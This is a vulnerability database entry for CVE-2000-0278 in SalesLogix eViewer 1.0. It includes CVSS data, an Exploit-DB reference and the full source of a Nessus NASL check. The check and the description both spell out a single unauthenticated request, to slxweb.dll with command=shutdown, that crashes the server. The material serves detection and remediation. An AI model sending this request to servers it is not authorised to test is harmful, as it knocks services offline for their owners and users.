Vulnerabilities > CVE-2000-0278 - Unspecified vulnerability in Saleslogix Corporation Eviewer 1.0

047910
CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
NONE
Integrity impact
NONE
Availability impact
PARTIAL
network
low complexity
saleslogix
nessus
exploit available

Summary

The SalesLogix Eviewer allows remote attackers to cause a denial of service by accessing the URL for the slxweb.dll administration program, which does not authenticate the user.

Vulnerable Configurations

Part Description Count
Application
Saleslogix
1

Exploit-Db

descriptionSalesLogix Corporation eViewer 1.0 DoS Vulnerability. CVE-2000-0278. Dos exploit for windows platform
idEDB-ID:19835
last seen2016-02-02
modified2000-03-31
published2000-03-31
reporterTodd Beebe
sourcehttps://www.exploit-db.com/download/19835/
titleSalesLogix Corporation eViewer 1.0 DoS Vulnerability

Nessus

NASL familyCGI abuses
NASL idEVIEWER.NASL
descriptionIt was possible to crash the remote server by requesting : GET /scripts/slxweb.dll/admin?command=shutdown A remote attacker could use this flaw to crash this host, preventing your network from working properly.
last seen2020-06-01
modified2020-06-02
plugin id10361
published2000-04-01
reporterThis script is Copyright (C) 2000-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/10361
titleSalesLogix eViewer slxweb.dll Request Remote DoS
code
#
# (C) Tenable Network Security, Inc.
#


include("compat.inc");


if(description)
{
 script_id(10361);
 script_version ("1.36");
 script_cve_id("CVE-2000-0278");
 script_bugtraq_id(1089);
 
 script_name(english:"SalesLogix eViewer slxweb.dll Request Remote DoS");
 script_summary(english:"Crashes Eviewer");
 
 script_set_attribute( attribute:"synopsis", value:
"A web application running on the remote host has a denial of service
vulnerability." );
 script_set_attribute( attribute:"description", value:
"It was possible to crash the remote server by requesting :

  GET /scripts/slxweb.dll/admin?command=shutdown

A remote attacker could use this flaw to crash this host,
preventing your network from working properly." );
 script_set_attribute(
   attribute:"see_also",
   value:"https://seclists.org/bugtraq/2000/Mar/353"
 );
 script_set_attribute(
   attribute:"solution", 
   value:"Remove this CGI from the web server."
 );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C");
 script_set_cvss_temporal_vector("CVSS2#E:F/RL:W/RC:C");
 script_set_attribute(attribute:"plugin_publication_date", value: "2000/04/01");
 script_set_attribute(attribute:"vuln_publication_date", value: "2000/03/31");
 script_cvs_date("Date: 2018/11/15 20:50:17");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_end_attributes();

 script_category(ACT_KILL_HOST);
 script_family(english:"CGI abuses");

 script_copyright(english:"This script is Copyright (C) 2000-2018 Tenable Network Security, Inc.");

 script_dependencies("http_version.nasl", "find_service1.nasl", "no404.nasl");
 script_require_ports("Services/www", 80);
 script_require_keys("Settings/ParanoidReport");

 exit(0);
}

#
# The script code starts here
#
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

port = get_http_port(default:80);

 if ( http_is_dead(port:port) ) exit(0);
 start_denial();
 r = http_send_recv3(method: "GET", item:"/scripts/slxweb.dll/admin?command=shutdown",
 	        port:port);
 alive = end_denial();
if(!alive && http_is_dead(port:port))
{
	security_hole(port);
	set_kb_item(name:"Host/dead", value:TRUE);
}